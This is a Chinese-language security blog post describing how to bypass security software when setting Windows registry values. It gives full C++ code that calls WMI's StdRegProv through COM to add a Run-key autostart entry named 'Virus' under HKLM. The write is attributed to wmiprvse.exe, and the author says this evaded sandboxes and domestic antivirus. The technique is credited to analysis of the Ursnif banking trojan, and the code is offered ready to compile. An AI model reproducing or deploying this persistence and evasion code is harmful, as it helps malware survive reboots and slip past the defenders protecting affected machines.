绕过安全软件设置注册表

1.前言

这个设置注册表的方式利用到了COM组件，这是我分析Ursnif银行木马时发现的一种利用方式，利用COM组件调用wmi设置注册表，如果用监控工具会看到设置注册表项的系统进程wmiprvse.exe。这里用了一些沙箱测试并没有检测出设置敏感注册表的行为，国内杀软也没爆出设置了敏感注册表的警告，具体就不详细说了，感兴趣的可以自己尝试一下。这个操作不知道有没有其他大佬写过，如有冲突望告知。

2.正文

这里就直接上代码了，主要是在run下设置一个键值，这里没有其他操作了，需要管理员权限运行，然后编译时要根据系统版本编译为x86或x64。

#include<iostream>
#include<comutil.h>
#include<WbemIdl.h>
#include<tchar.h>
#include<Exdisp.h>
#include<Winhttp.h>

#pragma comment(lib,"Wbemuuid.lib")
#pragma comment(lib,"comsuppw.lib")

int _tmain(int argc, _TCHAR* argv[])
{
  //初始化
  HRESULT hres = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
  if (FAILED(hres))
  {
    return 0;
  }

  //实例化
  IWbemLocator *pLoc = NULL;
  hres = CoCreateInstance(CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER, IID_IWbemLocator, (LPVOID *)&pLoc);
  if (FAILED(hres))
  {
    CoUninitialize();
    return 0;
  }

  //连接到命名空间
  IWbemServices *pSvc = NULL;
  pLoc->ConnectServer(L"root\default", NULL, NULL, 0, NULL, 0, 0, &pSvc);

  CoSetProxyBlanket(pSvc, 10, 0, 0, 3, 3, 0, 0);

  pLoc->Release();

  //获取对象StdRegProv
  IWbemClassObject *pObject = NULL;
  pSvc->GetObjectW(L"StdRegProv", 0, 0, &pObject, 0);

  //获取方法SetDWORDValue
  IWbemClassObject *pInSignature = NULL;
  pObject->GetMethod(L"SetStringValue", 0, &pInSignature, 0);

  //设置注册表项
  _variant_t var1(L"2147483650");
  pInSignature->Put(L"hDefKey", 0, &var1, CIM_UINT32);

  //设置路径
  _variant_t var2(L"SOFTWARE\Microsoft\Windows\CurrentVersion\Run");
  pInSignature->Put(L"sSubKeyName", 0, &var2, CIM_STRING);

  //设置项名
  _variant_t var3(L"Virus");
  pInSignature->Put(L"sValueName", 0, &var3, CIM_STRING);

  //设置值
  _variant_t var4(L"D:\test.exe");
  pInSignature->Put(L"sValue", 0, &var4, CIM_STRING);

  IWbemClassObject *pOutParams = NULL;
  pSvc->ExecMethod(L"StdRegProv", L"SetStringValue", 0, 0, pInSignature, &pOutParams, 0);

  pInSignature->Release();

  pObject->Release();

  pSvc->Release();

  return 0;
}

结果如图

3.对com的一些看法

对于COM没有很深的了解所以也不说太多。不过COM在安全方面的利用也开始慢慢多起来了，像玩转COM对象和玩转COM对象（Part 2）中就利用到了COM进行一些骚操作。如果有对COM有兴趣的，就加群一起讨论一下吧。